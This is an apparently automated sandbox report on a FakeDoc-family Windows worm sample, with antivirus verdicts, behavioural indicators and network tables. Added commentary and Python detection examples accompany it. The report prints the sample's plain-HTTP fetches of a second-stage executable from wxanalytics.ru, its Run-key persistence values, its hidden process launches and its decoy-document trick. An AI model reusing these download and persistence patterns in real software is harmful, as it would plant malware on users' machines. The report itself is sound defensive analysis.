Score: 7.0
Risk level: High
SHA256: e4214e1d74ed5e5077f3ebd7531256c9c6a43473d39f3506ae11a5872a9533a5
File name: dc4fc5826ca75b0847c9eb23786f3fce.exe (the name is the sample's MD5; the FireEye, McAfee and Cybereason detection names below are derived from the same hash)
Analysis duration: 101s
Last analyzed:
File size: 2.6MB
Flags: static detection, dynamic detection
Hawkeye (鹰眼) engine: not detected (no Hawkeye engine result available for this sample)
Static verdict

Anti-virus engines

Engine | Result | Scan date | Engine version
Alibaba | Worm:Win32/FakeDoc.1d2864ba | 20190527 | 0.3.0.5
Baidu | Win32.Worm.FakeDoc.a | 20190318 | 1.0.0.2
Tencent | Malware.Win32.Gencirc.10b6abd3 | 20201209 | 1.0.0.1
Kingsoft | | 20201209 | 2017.9.26.565
McAfee | GenericRXAH-AG!DC4FC5826CA7 | 20201209 | 6.0.6.653
CrowdStrike | win/malicious_confidence_100% (W) | 20190702 | 1.0
Behavioural verdict

Dynamic indicators

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)
suspicious_features: GET method with no useragent header  suspicious_request: GET http://wxanalytics.ru/net.exe.config
suspicious_features: GET method with no useragent header  suspicious_request: GET http://wxanalytics.ru/net.exe
Performs some HTTP requests (2 events)
request: GET http://wxanalytics.ru/net.exe.config
request: GET http://wxanalytics.ru/net.exe
Resolves a suspicious Top Level Domain (TLD) (1 event)
domain: wxanalytics.ru  description: Russian Federation domain TLD
The two fetches look like a second-stage download: an executable plus a file named in the .NET application-configuration pattern (<app>.exe.config). The .ru TLD is a weak signal on its own; the missing User-Agent and the executable download over plain HTTP are the stronger ones.
Allocates read-write-execute memory (usually to unpack itself) (2 events)
Time | API | Status | Return | Repeated
1621001761.098 | NtAllocateVirtualMemory | success | 0 | 0
  process_identifier: 1424; region_size: 65536; stack_dep_bypass: 0; stack_pivoted: 0; heap_dep_bypass: 0; protection: 64 (PAGE_EXECUTE_READWRITE); process_handle: 0xffffffffffffffff; allocation_type: 4096 (MEM_COMMIT); base_address: 0x0000000004070000
1621001694.723125 | NtAllocateVirtualMemory | success | 0 | 0
  process_identifier: 192; region_size: 4096; stack_dep_bypass: 0; stack_pivoted: 0; heap_dep_bypass: 0; protection: 64 (PAGE_EXECUTE_READWRITE); process_handle: 0xffffffff; allocation_type: 4096 (MEM_COMMIT); base_address: 0x02830000
Both calls pass the current-process pseudo-handle (HANDLE)-1, logged as 0xffffffffffffffff for process 1424 and 0xffffffff for process 192, which suggests one 64-bit and one 32-bit caller. The memory is therefore committed in each caller's own address space, the unpacking pattern the signature name refers to, not written into a foreign process; a handle value other than -1 here would be the injection case.
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
A process attempted to delay the analysis task. (1 event)
description: mls.exe tried to sleep 136 seconds, actually delayed analysis time by 136 seconds
Creates (office) documents on the filesystem (1 event)
file: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\dc4fc5826ca75b0847c9eb23786f3fce.docx
The .docx carries the sample's own name, is written to %TEMP% and is then handed to ShellExecuteExW (first hidden-window event below): the decoy-document pattern behind the FakeDoc/HideDoc family names in the AV results, where the victim sees a document open while the payload runs from %APPDATA%\Roaming\RAC.
A process created a hidden window (3 events)
Time | API | Status | Return | Repeated
1620985521.342895 | ShellExecuteExW | success | 1 | 0
  parameters: (empty); filepath: dc4fc5826ca75b0847c9eb23786f3fce.docx; filepath_r: dc4fc5826ca75b0847c9eb23786f3fce.docx; show_type: 0
1620985521.608895 | ShellExecuteExW | success | 1 | 0
  parameters: -s; filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\mls.exe; filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\mls.exe; show_type: 0
1621001721.801625 | ShellExecuteExW | failed | 0 | 0
  parameters: (empty); filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\svcsc.exe; filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\svcsc.exe; show_type: 0
show_type 0 is SW_HIDE. The launches of the decoy document and of mls.exe -s succeeded; the svcsc.exe launch failed. The first two timestamps are about four and a half hours earlier than the third and than the memory allocations above, far more than the 101 s analysis duration, so this report merges events from more than one run.
The binary likely contains encrypted or compressed data indicative of a packer (2 events)
entropy: 7.119422995234983  section: {'size_of_data': '0x001ca600', 'virtual_address': '0x000b7000', 'entropy': 7.119422995234983, 'name': '.rsrc', 'virtual_size': '0x001ca57c'}  description: A section with a high entropy has been found
entropy: 0.7003437738731857  description: Overall entropy of this PE file is high
The two figures are on different scales. The first is the Shannon entropy of the .rsrc section in bits per byte (7.12 of a possible 8). The second is not a Shannon value: the Cuckoo-style packer signature that emits this message reports the fraction of the file's section bytes that sit in high-entropy sections, and 0x1ca600 (1,877,504 bytes of .rsrc data) is about 70% of the 2.6MB file. A resource section this large and this dense points to an embedded compressed or encrypted blob rather than a packed code section; the resource-handling imports listed below (FindResourceW, LoadResource, LockResource, SizeofResource) fit that reading.
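The two-scale reading of these entropy figures can be reproduced in a few lines. The following is an added example, not code from the report or from any sandbox: it computes per-section Shannon entropy and the Cuckoo-style packed-data ratio over constructed stand-in sections (a 32-symbol repeating pattern for .text, seeded pseudo-random bytes for .rsrc, sized so that .rsrc holds about 70% of the data as in the report). The 6.8 bits/byte section threshold and the 0.2 ratio threshold are the ones used by the Cuckoo community packer_entropy signature; the section contents are made up.

```python
import math
import random
from collections import Counter

# Thresholds of the Cuckoo-style "packer_entropy" signature behind the two messages
# above: a section is "high entropy" above 6.8 bits/byte, and the file is flagged when
# more than 20% of its section bytes live in such sections.
SECTION_ENTROPY_THRESHOLD = 6.8
PACKED_RATIO_THRESHOLD = 0.2


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or constant input, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def packer_heuristic(sections):
    """sections: iterable of (name, raw_bytes) taken from a PE section table.

    Returns (high_entropy_sections, packed_ratio, is_packed). packed_ratio is the share
    of section data living in high-entropy sections; this ratio, not a Shannon value,
    is what the report prints as "overall entropy".
    """
    total = high = 0
    flagged = []
    for name, data in sections:
        total += len(data)
        ent = shannon_entropy(data)
        if ent > SECTION_ENTROPY_THRESHOLD:
            flagged.append((name, round(ent, 3)))
            high += len(data)
    ratio = high / total if total else 0.0
    return flagged, ratio, ratio > PACKED_RATIO_THRESHOLD


def build_sample_sections():
    """Constructed stand-in for the sample's sections (not bytes from the real file):
    a low-entropy .text (32 distinct byte values, entropy exactly 5.0 bits/byte) and a
    pseudo-random .rsrc sized to hold ~70% of the section data, mirroring the 0.70
    ratio reported above."""
    text = bytes(range(32)) * 937                              # 29,984 bytes
    rng = random.Random(20210514)                              # fixed seed: deterministic
    rsrc = bytes(rng.getrandbits(8) for _ in range(70_000))    # ~8.0 bits/byte
    return [(".text", text), (".rsrc", rsrc)]


if __name__ == "__main__":
    flagged, ratio, packed = packer_heuristic(build_sample_sections())
    for name, ent in flagged:
        print(f"{name}: entropy {ent} > {SECTION_ENTROPY_THRESHOLD} (high)")
    print(f"share of data in high-entropy sections: {ratio:.4f} -> packed={packed}")
```

On a real file, feed `packer_heuristic` the `(name, section.get_data())` pairs from a PE parser; the ratio only becomes meaningful when every section is included, since a small high-entropy section in a large file should not trip the file-level flag.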
Uses Windows utilities for basic Windows functionality (1 event)
cmdline: C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\svcsc.exe
The command line is the dropped svcsc.exe under %APPDATA%\Roaming\RAC, not a Microsoft utility; the file name merely resembles system binaries, so treat this indicator as a name-matching artefact rather than evidence of living-off-the-land activity.
Network communication

Communicates with host for which no DNS query was performed (1 event)
host: 172.217.24.14
This address lies in a Google-owned range and does not appear in the TCP or UDP flow tables below, so it is more plausibly guest background traffic than sample activity; the sample's own connections go to wxanalytics.ru.
Installs itself for autorun at Windows startup (2 events)
reg_key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mls  reg_value: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\mls.exe" -s
reg_key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svcsc.exe  reg_value: C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC\svcsc.exe
Both values point into %APPDATA%\Roaming\RAC, and mls.exe is registered with the same -s switch used in its hidden launch above. HKCU Run keys need no elevation, so this persistence works for an unprivileged user and survives logoff but not a change of user profile.
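The indicators above are the output of a handful of small signatures evaluated over the sandbox's API log. The following added example, which is not part of the report nor of any sandbox's code, re-implements four of them (RWX allocation, hidden-window ShellExecuteExW, Run-key persistence, and a long NtDelayExecution) over a constructed event list shaped after the entries above. The event dictionary layout, the NtDelayExecution record, the remote handle 0x1f8, the protection-4 allocation, the visible notepad.exe launch and the Explorer registry write are assumptions made for the example as controls; the other values are copied from the report. It also splits RWX allocations by whether the handle is the caller's own pseudo-handle, which is the check that separates self-unpacking from cross-process injection.

```python
import re

PAGE_EXECUTE_READWRITE = 0x40                               # "protection: 64" in the log
SW_HIDE = 0                                                 # "show_type: 0" in ShellExecuteExW
CURRENT_PROCESS_HANDLES = {0xffffffff, 0xffffffffffffffff}  # (HANDLE)-1, 32- and 64-bit
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\\", re.IGNORECASE)
SLEEP_THRESHOLD_MS = 60_000                                 # one wait >= 60 s counts as a delay

# Constructed event log shaped after the report (values copied from the page where it
# shows them; the protection 4 allocation, the remote handle 0x1f8, the visible notepad
# launch, the Explorer registry write and the NtDelayExecution record are made up).
RAC = r"C:\Users\Administrator.Oskar-PC\AppData\Roaming\RAC"
EVENTS = [
    {"api": "NtAllocateVirtualMemory", "pid": 1424,
     "args": {"protection": 0x40, "process_handle": 0xffffffffffffffff, "region_size": 65536}},
    {"api": "NtAllocateVirtualMemory", "pid": 192,
     "args": {"protection": 0x40, "process_handle": 0xffffffff, "region_size": 4096}},
    {"api": "NtAllocateVirtualMemory", "pid": 192,
     "args": {"protection": 0x04, "process_handle": 0xffffffff, "region_size": 4096}},
    {"api": "NtAllocateVirtualMemory", "pid": 192,
     "args": {"protection": 0x40, "process_handle": 0x1f8, "region_size": 4096}},
    {"api": "ShellExecuteExW", "pid": 1424,
     "args": {"filepath": "dc4fc5826ca75b0847c9eb23786f3fce.docx", "parameters": "", "show_type": 0}},
    {"api": "ShellExecuteExW", "pid": 1424,
     "args": {"filepath": RAC + r"\mls.exe", "parameters": "-s", "show_type": 0}},
    {"api": "ShellExecuteExW", "pid": 1424,
     "args": {"filepath": r"C:\Windows\notepad.exe", "parameters": "", "show_type": 1}},
    {"api": "NtDelayExecution", "pid": 2200, "args": {"milliseconds": 136_000}},
    {"api": "RegSetValueExW", "pid": 2200,
     "args": {"regkey": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mls",
              "value": '"' + RAC + r'\mls.exe" -s'}},
    {"api": "RegSetValueExW", "pid": 2200,
     "args": {"regkey": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svcsc.exe",
              "value": RAC + r"\svcsc.exe"}},
    {"api": "RegSetValueExW", "pid": 2200,
     "args": {"regkey": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
              "value": "2"}},
]


def sig_rwx_allocation(events):
    """RWX commits. 'self' = the caller's own address space (unpacking);
    any other handle is a foreign process (injection candidate)."""
    marks = []
    for e in events:
        a = e["args"]
        if e["api"] == "NtAllocateVirtualMemory" and a.get("protection") == PAGE_EXECUTE_READWRITE:
            target = "self" if a.get("process_handle") in CURRENT_PROCESS_HANDLES else "remote"
            marks.append({"pid": e["pid"], "size": a.get("region_size"), "target": target})
    return marks


def sig_hidden_window(events):
    """ShellExecuteExW with show_type SW_HIDE: a process started without a visible window."""
    return [{"pid": e["pid"], "file": e["args"].get("filepath"), "params": e["args"].get("parameters", "")}
            for e in events if e["api"] == "ShellExecuteExW" and e["args"].get("show_type") == SW_HIDE]


def sig_autorun(events):
    """Any RegSetValueEx* under a ...\\CurrentVersion\\Run or RunOnce key."""
    return [{"key": e["args"]["regkey"], "value": e["args"].get("value")}
            for e in events
            if e["api"].startswith("RegSetValueEx") and RUN_KEY_RE.search(e["args"].get("regkey", ""))]


def sig_analysis_delay(events):
    """A single NtDelayExecution at or above the threshold (the 136 s sleep above)."""
    return [{"pid": e["pid"], "seconds": e["args"]["milliseconds"] / 1000}
            for e in events
            if e["api"] == "NtDelayExecution" and e["args"].get("milliseconds", 0) >= SLEEP_THRESHOLD_MS]


SIGNATURES = {
    "allocates_rwx_memory": sig_rwx_allocation,
    "creates_hidden_window": sig_hidden_window,
    "persistence_autorun": sig_autorun,
    "antisandbox_sleep": sig_analysis_delay,
}


def run_signatures(events):
    """Return {signature_name: marks} for every signature that matched at least once."""
    result = {}
    for name, fn in SIGNATURES.items():
        marks = fn(events)
        if marks:
            result[name] = marks
    return result


if __name__ == "__main__":
    for name, marks in run_signatures(EVENTS).items():
        print(f"{name} ({len(marks)} events)")
        for m in marks:
            print("   ", m)
```

The remote/self split is the detail the report's signature omits: the two RWX allocations recorded above both come back as "self", which is why they read as unpacking rather than as injection into another process.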
File has been identified by 63 AntiVirus engines on VirusTotal as malicious (50 of the 63 results shown)
Engine | Result
Bkav | W32.AIDetectVM.malware1
Elastic | malicious (high confidence)
MicroWorld-eScan | Gen:Variant.Ser.Zusy.2350
FireEye | Generic.mg.dc4fc5826ca75b08
CAT-QuickHeal | Worm.Fadok.A5
Qihoo-360 | Win32/Virus.HideDoc.K
ALYac | Gen:Variant.Ser.Zusy.2350
Cylance | Unsafe
VIPRE | Trojan.Win32.Generic.pak!cobra
Sangfor | Malware
K7AntiVirus | Trojan ( 004c3bbe1 )
Alibaba | Worm:Win32/FakeDoc.1d2864ba
K7GW | Trojan ( 004c3bbe1 )
Cybereason | malicious.26ca75
Arcabit | Trojan.Ser.Zusy.D92E
Baidu | Win32.Worm.FakeDoc.a
Cyren | W32/Fakedoc.PZJA-4253
Symantec | SMG.Heur!gen
APEX | Malicious
Paloalto | generic.ml
ClamAV | Win.Malware.Razy-6723913-0
Kaspersky | Trojan.Win32.Agent.ifdx
BitDefender | Gen:Variant.Ser.Zusy.2350
NANO-Antivirus | Trojan.Win32.Rendoc.faojir
AegisLab | Trojan.Win32.Agent.tnEr
Tencent | Malware.Win32.Gencirc.10b6abd3
Ad-Aware | Gen:Variant.Ser.Zusy.2350
Sophos | Mal/Generic-R + Troj/FakeDoc-B
Comodo | TrojWare.Win32.Scar.FAKD@5xdxi2
F-Secure | Trojan.TR/ATRAPS.Gen4
DrWeb | Win32.HLLW.Rendoc.3
Zillya | Trojan.Scar.Win32.88546
TrendMicro | WORM_FAKEDOC_FD050240.UVPM
McAfee-GW-Edition | BehavesLike.Win32.Generic.vc
Emsisoft | Worm.FakeDoc (A)
SentinelOne | Static AI - Suspicious PE
Jiangmin | Worm.Agent.ju
Avira | TR/ATRAPS.Gen4
MAX | malware (ai score=89)
Antiy-AVL | Trojan/Win32.Scar.jfya
Gridinsoft | Trojan.Win32.Agent.vb
Microsoft | Worm:Win32/Fadok!rfn
ZoneAlarm | Trojan.Win32.Agent.ifdx
GData | Gen:Variant.Ser.Zusy.2350
Cynet | Malicious (score: 100)
AhnLab-V3 | Worm/Win32.Fadok.R189010
Acronis | suspicious
McAfee | GenericRXAH-AG!DC4FC5826CA7
VBA32 | Trojan.Agent
Malwarebytes | Trojan.FakeDoc
The named detections cluster around FakeDoc / HideDoc / Fadok / Rendoc and several engines classify the sample as a worm, consistent with the decoy .docx behaviour recorded above and with the file-enumeration and copy imports listed below.
Visual analysis
Binary image: none (no binary visualization was generated for this sample)
Runtime screenshots: none (no screenshots were captured while the sample ran)


PE Compile Time

2015-02-13 02:50:20

Imports

Library KERNEL32.dll:
0x49403c ReleaseMutex
0x494040 FreeResource
0x494044 FindResourceW
0x494048 FreeLibrary
0x49404c LoadResource
0x494050 LoadLibraryExW
0x494054 SizeofResource
0x494058 LockResource
0x49405c EndUpdateResourceW
0x494064 UpdateResourceW
0x494068 ConnectNamedPipe
0x49406c CreateNamedPipeW
0x494070 GetLastError
0x494074 CreateThread
0x494078 FindFirstFileW
0x49407c PeekNamedPipe
0x494084 GetModuleFileNameW
0x494088 FindClose
0x49408c FindNextFileW
0x494090 SetFileAttributesW
0x494098 GetModuleHandleW
0x49409c WaitForSingleObject
0x4940a0 CreateMutexW
0x4940a4 DeleteFileW
0x4940a8 GetFileAttributesW
0x4940ac CopyFileW
0x4940b0 Sleep
0x4940b4 MoveFileExW
0x4940b8 GetTickCount
0x4940bc SetLastError
0x4940d0 VerSetConditionMask
0x4940d4 SleepEx
0x4940d8 VerifyVersionInfoA
0x4940dc FormatMessageA
0x4940e0 GetProcAddress
0x4940e8 GetFileType
0x4940ec GetStdHandle
0x4940f0 LoadLibraryA
0x4940f8 WideCharToMultiByte
0x494104 MultiByteToWideChar
0x494108 GetStringTypeW
0x49410c GetCurrentThreadId
0x494110 EncodePointer
0x494114 DecodePointer
0x494118 InterlockedExchange
0x49411c DuplicateHandle
0x494120 GetCurrentProcess
0x494124 GetCurrentThread
0x49412c GetCommandLineW
0x494130 HeapFree
0x494138 FindFirstFileExW
0x494140 HeapAlloc
0x494144 GetCPInfo
0x494148 IsDebuggerPresent
0x494150 GetDriveTypeW
0x494154 ExitThread
0x494158 SetFilePointerEx
0x494160 GetCurrentProcessId
0x494164 RaiseException
0x494168 RtlUnwind
0x494170 CreateTimerQueue
0x494178 TlsGetValue
0x494184 TerminateProcess
0x494188 TlsAlloc
0x49418c TlsSetValue
0x494190 TlsFree
0x494194 GetStartupInfoW
0x494198 CreateSemaphoreW
0x49419c GetDateFormatW
0x4941a0 GetTimeFormatW
0x4941a4 CompareStringW
0x4941a8 LCMapStringW
0x4941ac GetLocaleInfoW
0x4941b0 IsValidLocale
0x4941b4 GetUserDefaultLCID
0x4941b8 EnumSystemLocalesW
0x4941bc ExitProcess
0x4941c0 GetModuleHandleExW
0x4941c4 AreFileApisANSI
0x4941c8 GetProcessHeap
0x4941d8 HeapSize
0x4941dc FlushFileBuffers
0x4941e0 GetConsoleCP
0x4941e4 GetConsoleMode
0x4941e8 GetFullPathNameW
0x4941f0 IsValidCodePage
0x4941f4 GetACP
0x4941f8 GetOEMCP
0x494200 ReadConsoleW
0x494204 SetStdHandle
0x494214 OutputDebugStringW
0x494218 SwitchToThread
0x49421c GetThreadTimes
0x494224 GetModuleHandleA
0x494228 SetEvent
0x49422c CreateEventW
0x494230 SetThreadPriority
0x494234 GetVersionExW
0x494238 VirtualAlloc
0x49423c VirtualFree
0x494240 VirtualProtect
0x494244 ReleaseSemaphore
0x494248 InitializeSListHead
0x494258 QueryDepthSList
0x49425c UnregisterWaitEx
0x49426c LoadLibraryW
0x494270 WriteConsoleW
0x494274 SetEndOfFile
0x49427c GetThreadPriority
0x494280 UnregisterWait
0x494284 SignalObjectAndWait
0x494288 ReadFile
0x49428c SetFilePointer
0x494290 CloseHandle
0x494294 CreateFileW
0x494298 HeapReAlloc
0x49429c WriteFile
Library ADVAPI32.dll:
0x494000 CryptEncrypt
0x494004 CryptGetHashParam
0x494008 CryptDestroyKey
0x49400c CryptReleaseContext
0x494014 CryptImportKey
0x494018 CryptCreateHash
0x49401c CryptHashData
0x494020 CryptDestroyHash
0x494024 RegSetValueExW
0x494028 RegCloseKey
0x49402c RegOpenKeyExW
0x494030 RegOpenKeyW
0x494034 RegQueryValueExW
Library SHELL32.dll:
0x4942a8 ShellExecuteW
Library WS2_32.dll:
0x4942f4 socket
0x4942f8 WSAIoctl
0x4942fc getaddrinfo
0x494300 freeaddrinfo
0x494304 setsockopt
0x494308 sendto
0x49430c accept
0x494310 listen
0x494314 ioctlsocket
0x494318 gethostname
0x49431c ntohs
0x494320 htons
0x494324 getsockopt
0x494328 getsockname
0x49432c getpeername
0x494330 connect
0x494334 closesocket
0x494338 bind
0x49433c send
0x494340 recv
0x494344 WSASetLastError
0x494348 select
0x49434c __WSAFDIsSet
0x494350 WSAGetLastError
0x494354 WSACleanup
0x494358 WSAStartup
0x49435c recvfrom
Library WLDAP32.dll (16 entries imported by ordinal, so the parser shows no names):
0x4942b0
0x4942b4
0x4942b8
0x4942bc
0x4942c0
0x4942c4
0x4942c8
0x4942cc
0x4942d0
0x4942d4
0x4942d8
0x4942dc
0x4942e0
0x4942e4
0x4942e8
0x4942ec
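Reading an import table of this size by hand is error-prone, so here is an added example (mine, not code from the report or the sandbox) that parses the report's own "Library X:" / "0xaddr Name" layout and maps the imported names to capabilities. The embedded excerpt is copied from the table above but shortened; the capability groupings and their minimum-hit counts are my own assumptions, not a published taxonomy; ordinal-only entries such as the WLDAP32 lines are counted separately because nothing can be said about them without resolving the ordinals against the DLL's export table.

```python
import re

# Excerpt of the import table above, in the report's own "Library X:" / "0xaddr Name"
# layout (shortened; the WLDAP32 entries are address-only, i.e. imported by ordinal).
IMPORT_TABLE = """\
Library KERNEL32.dll:
0x494044 FindResourceW
0x49404c LoadResource
0x494058 LockResource
0x49405c EndUpdateResourceW
0x494064 UpdateResourceW
0x49406c CreateNamedPipeW
0x494078 FindFirstFileW
0x49408c FindNextFileW
0x4940a0 CreateMutexW
0x4940ac CopyFileW
0x4940e0 GetProcAddress
0x4940f0 LoadLibraryA
0x494148 IsDebuggerPresent
0x494238 VirtualAlloc
0x494240 VirtualProtect
Library ADVAPI32.dll:
0x494000 CryptEncrypt
0x494014 CryptImportKey
0x494024 RegSetValueExW
Library SHELL32.dll:
0x4942a8 ShellExecuteW
Library WS2_32.dll:
0x4942f4 socket
0x49430c accept
0x494310 listen
0x494330 connect
0x494338 bind
0x49433c send
Library WLDAP32.dll:
0x4942b0
0x4942b4
"""

# Capability groups (my grouping, not the sandbox's): minimum distinct hits, API names.
CAPABILITIES = {
    "reads embedded resources":     (3, {"FindResourceW", "LoadResource", "LockResource", "SizeofResource"}),
    "rewrites own resources":       (1, {"UpdateResourceW", "EndUpdateResourceW"}),
    "file enumeration and copying": (3, {"FindFirstFileW", "FindNextFileW", "CopyFileW", "GetDriveTypeW", "SetFileAttributesW"}),
    "CryptoAPI":                    (2, {"CryptImportKey", "CryptEncrypt", "CryptCreateHash", "CryptHashData"}),
    "registry write":               (1, {"RegSetValueExW"}),
    "outbound TCP client":          (2, {"socket", "connect", "send", "recv", "getaddrinfo"}),
    "listening TCP server":         (2, {"bind", "listen", "accept"}),
    "named pipe IPC":               (1, {"CreateNamedPipeW", "ConnectNamedPipe"}),
    "debugger check":               (1, {"IsDebuggerPresent"}),
    "runtime API resolution":       (2, {"LoadLibraryA", "GetProcAddress"}),
    "executable memory":            (2, {"VirtualAlloc", "VirtualProtect"}),
    "process launch":               (1, {"ShellExecuteW"}),
    "single-instance mutex":        (1, {"CreateMutexW"}),
}

LIB_RE = re.compile(r"^Library\s+(\S+):$")
ENTRY_RE = re.compile(r"^(0x[0-9a-fA-F]+)(?:\s+(\S+))?$")


def parse_imports(text):
    """Return {library: [(iat_address, name_or_None), ...]} from the report layout."""
    libs, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LIB_RE.match(line)
        if m:
            current = m.group(1)
            libs.setdefault(current, [])
            continue
        m = ENTRY_RE.match(line)
        if m and current is not None:
            libs[current].append((int(m.group(1), 16), m.group(2)))
    return libs


def capability_profile(libs):
    """Map each capability to the sorted imported names that support it."""
    names = {name for entries in libs.values() for _, name in entries if name}
    profile = {}
    for cap, (min_hits, apis) in CAPABILITIES.items():
        hits = sorted(names & apis)
        if len(hits) >= min_hits:
            profile[cap] = hits
    return profile


def ordinal_only_imports(libs):
    """Libraries that have unnamed (ordinal) imports, with the count for each."""
    counts = {lib: sum(1 for _, n in entries if n is None) for lib, entries in libs.items()}
    return {lib: n for lib, n in counts.items() if n}


if __name__ == "__main__":
    libs = parse_imports(IMPORT_TABLE)
    for cap, hits in capability_profile(libs).items():
        print(f"{cap:30s} {', '.join(hits)}")
    print("ordinal-only imports:", ordinal_only_imports(libs))
```

Run against the full table above, the combinations worth noticing are the listening set (bind/listen/accept) next to the client set, the resource-update pair (UpdateResourceW/EndUpdateResourceW) next to the resource-reading calls, and CryptImportKey/CryptEncrypt alongside file enumeration and copying; each is a capability, not proof that it is exercised, which is what the dynamic section above is for.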

Hosts

No hosts contacted (as reported by the summary field; the TCP table below nonetheless records two connections to 35.205.61.67 / wxanalytics.ru on port 80, so this field should not be relied on by itself).

TCP

Source | Source port | Destination | Hostname | Destination port
192.168.56.101 | 49178 | 35.205.61.67 | wxanalytics.ru | 80
192.168.56.101 | 49183 | 35.205.61.67 | wxanalytics.ru | 80

UDP

Source | Source port | Destination | Hostname | Destination port
192.168.56.101 | 49235 | 114.114.114.114 | | 53
192.168.56.101 | 50534 | 114.114.114.114 | | 53
192.168.56.101 | 51808 | 114.114.114.114 | | 53
192.168.56.101 | 56539 | 114.114.114.114 | | 53
192.168.56.101 | 57874 | 114.114.114.114 | | 53
192.168.56.101 | 58367 | 114.114.114.114 | | 53
192.168.56.101 | 65004 | 114.114.114.114 | | 53
192.168.56.101 | 137 | 192.168.56.255 | | 137
192.168.56.101 | 138 | 192.168.56.255 | | 138
192.168.56.101 | 123 | 20.189.79.72 | time.windows.com | 123
192.168.56.101 | 51378 | 224.0.0.252 | | 5355
192.168.56.101 | 55368 | 224.0.0.252 | | 5355
192.168.56.101 | 56804 | 224.0.0.252 | | 5355
192.168.56.101 | 60123 | 224.0.0.252 | | 5355
192.168.56.101 | 62191 | 224.0.0.252 | | 5355
192.168.56.101 | 1900 | 239.255.255.250 | | 1900
192.168.56.101 | 56540 | 239.255.255.250 | | 3702
192.168.56.101 | 56807 | 239.255.255.250 | | 1900
192.168.56.101 | 58368 | 239.255.255.250 | | 3702
192.168.56.101 | 58707 | 239.255.255.250 | | 3702
Only the DNS queries to 114.114.114.114 (the resolver the guest is configured with) relate to the sample's download. The NetBIOS (137/138), NTP (123, time.windows.com), LLMNR (5355), SSDP (1900) and WS-Discovery (3702) packets are ordinary Windows background traffic and should not be read as sample activity.

HTTP & HTTPS Requests

URI | Data
http://wxanalytics.ru/net.exe.config
GET /net.exe.config HTTP/1.1
Host: wxanalytics.ru
Accept: */*

http://wxanalytics.ru/net.exe
GET /net.exe HTTP/1.1
Host: wxanalytics.ru
Accept: */*

Both requests go over plain HTTP and carry only Host and Accept headers; the absent User-Agent is what the "GET method with no useragent header" indicator above keys on, and a proxy or egress rule that requires a User-Agent would have blocked both fetches. No TLS was observed, which matches the empty Suricata TLS section below.
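Written out as a check that runs over raw requests, this is the logic behind the HTTP indicators above; it is an added example, not the sandbox's code. The three requests are constructed: the first two reproduce the headers captured above, the third is a benign control with a User-Agent fetching a page from a .com host. The TLD and extension lists are my own assumptions, not the sandbox's actual lists, and the ".exe.config" branch recognises the .NET application-configuration naming pattern.

```python
from urllib.parse import urlsplit

# Assumed trigger lists for this example (not the sandbox's own): TLDs treated as
# suspicious, and extensions that mark a fetched file as an executable.
SUSPICIOUS_TLDS = {"ru", "su", "tk", "top", "xyz"}
EXECUTABLE_EXTS = (".exe", ".dll", ".scr", ".msi", ".ps1", ".bat")

# Constructed traffic: the first two requests reproduce the headers captured above,
# the third is a benign control with a User-Agent fetching a page from a .com host.
RAW_REQUESTS = [
    "GET /net.exe.config HTTP/1.1\r\nHost: wxanalytics.ru\r\nAccept: */*\r\n\r\n",
    "GET /net.exe HTTP/1.1\r\nHost: wxanalytics.ru\r\nAccept: */*\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n",
]


def parse_request(raw):
    """Split a raw HTTP/1.x request into request line, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers, "body": body}


def assess_request(raw):
    """Return (url, findings) with one finding string per indicator that fired."""
    req = parse_request(raw)
    host = req["headers"].get("host", "")
    path = urlsplit(req["target"]).path.lower()       # drop any query string
    findings = []
    if "user-agent" not in req["headers"]:
        findings.append("no User-Agent header")      # the report's suspicious_features hit
    tld = host.rsplit(".", 1)[-1].lower() if "." in host else ""
    if tld in SUSPICIOUS_TLDS:
        findings.append(f"suspicious TLD .{tld}")
    if path.endswith(".config") and path[:-len(".config")].endswith(EXECUTABLE_EXTS):
        findings.append("fetches <app>.exe.config, the .NET application config naming pattern")
    elif path.endswith(EXECUTABLE_EXTS):
        findings.append("fetches an executable over plain HTTP")
    return f"http://{host}{req['target']}", findings


def triage(raws):
    """Map URL -> findings for every request that triggered at least one indicator."""
    out = {}
    for raw in raws:
        url, findings = assess_request(raw)
        if findings:
            out[url] = findings
    return out


if __name__ == "__main__":
    for url, findings in triage(RAW_REQUESTS).items():
        print(url)
        for f in findings:
            print("   -", f)
```

The same three checks translate directly into proxy-log queries: a missing User-Agent alone is noisy (many updaters omit it), but combined with an executable path and a first-seen host it is a reasonable alert.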

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

No dropped files were captured.
No dropped buffers were captured.
Note that the behaviour section above records a .docx written to %TEMP% and two executables launched from %APPDATA%\Roaming\RAC (mls.exe and svcsc.exe); none of them was retained by the sandbox, so they cannot be retrieved from this report.